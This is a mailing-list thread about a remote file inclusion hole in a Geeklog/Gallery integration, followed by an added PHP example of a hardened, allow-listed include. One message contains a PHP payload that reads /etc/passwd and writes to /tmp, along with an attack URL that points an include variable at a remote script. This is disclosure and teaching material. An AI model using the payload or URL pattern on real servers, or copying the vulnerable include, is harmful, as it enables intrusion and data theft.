Dirk Haun wrote:
Jason,
This article worries me a bit:
http://www.securityfocus.com/guest/24043
[...]
The vulnerability discussed allowed me to write arbitrary data to the
server's hard disk, run all kinds of shell commands, and get the output
back in my browser. Worrying to be sure.
Hmm, I've only skimmed the article so far but my first impression was that
it a) was "only" a problem of the Geeklog/Gallery integration (not of
Geeklog itself) and b) was "only" used to send spam.
I must have missed the bit about writing to the server's hard disk, but I
don't really have the time now to look into it. Can someone confirm if
this is "only" a problem with the Gallery integration?
bye, Dirk
Hello again,
The article didn't mention writing to the server's hard disk. I was
able to do that myself after reading the article. It's not hard, once
you get the basic idea.
Essentially, this allows you to feed PHP script to a remote server,
which will then execute it. So, if your server is running Gallery &
Geeklog, I can make your server execute this:
<?
passthru('cat /etc/passwd');
passthru('echo "MY DATA HERE" > /tmp/mydataonyourdisk.file');
. . .
?>
As far as I know, this is possible anywhere someone does something like
this:
include("$VARIABLE/file.php");
A user in the know could construct a URL like
http://yoursite.com/blah.php?VARIABLE=http://mysite.com/mycode.php.
I'm not an expert by any means, so if this doesn't make sense or is
wrong, let me know.
-Jason
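
The include pattern described in this thread, next to a hardened form. This is an added example, not part of the original messages and not Geeklog or Gallery code; `resolve_module()`, the `gallery` module name and the temporary demo directory are hypothetical.

```php
<?php
// Added example; resolve_module() and the 'gallery' module are hypothetical.
//
// Pattern from the thread: with register_globals on, a request parameter can
// set $VARIABLE, and with URL includes enabled PHP fetches and runs the file.
//     include("$VARIABLE/file.php");

/** Map a module name to a file under $baseDir; null means "refuse". */
function resolve_module(string $name, string $baseDir, array $allowed): ?string
{
    // 1. Accept only names on a fixed allow-list. A URL or "../" never matches.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: the resolved file must still sit under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '/file.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree with one legitimate module.
$base = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($base . '/gallery', 0700, true);
file_put_contents($base . '/gallery/file.php', "<?php return 'gallery loaded';");

// Constructed inputs: one valid name, a remote URL, a traversal, an unknown name.
$inputs = ['gallery', 'http://example.invalid/mycode.php', '../../etc', 'unknown'];
foreach ($inputs as $in) {
    $path = resolve_module($in, $base, ['gallery']);
    $result = ($path === null) ? 'refused' : (include $path);
    echo str_pad($in, 36), ' => ', $result, PHP_EOL;
}

unlink($base . '/gallery/file.php');
rmdir($base . '/gallery');
rmdir($base);
```

Only the first input reaches `include`; the other three are refused before any path is built from them.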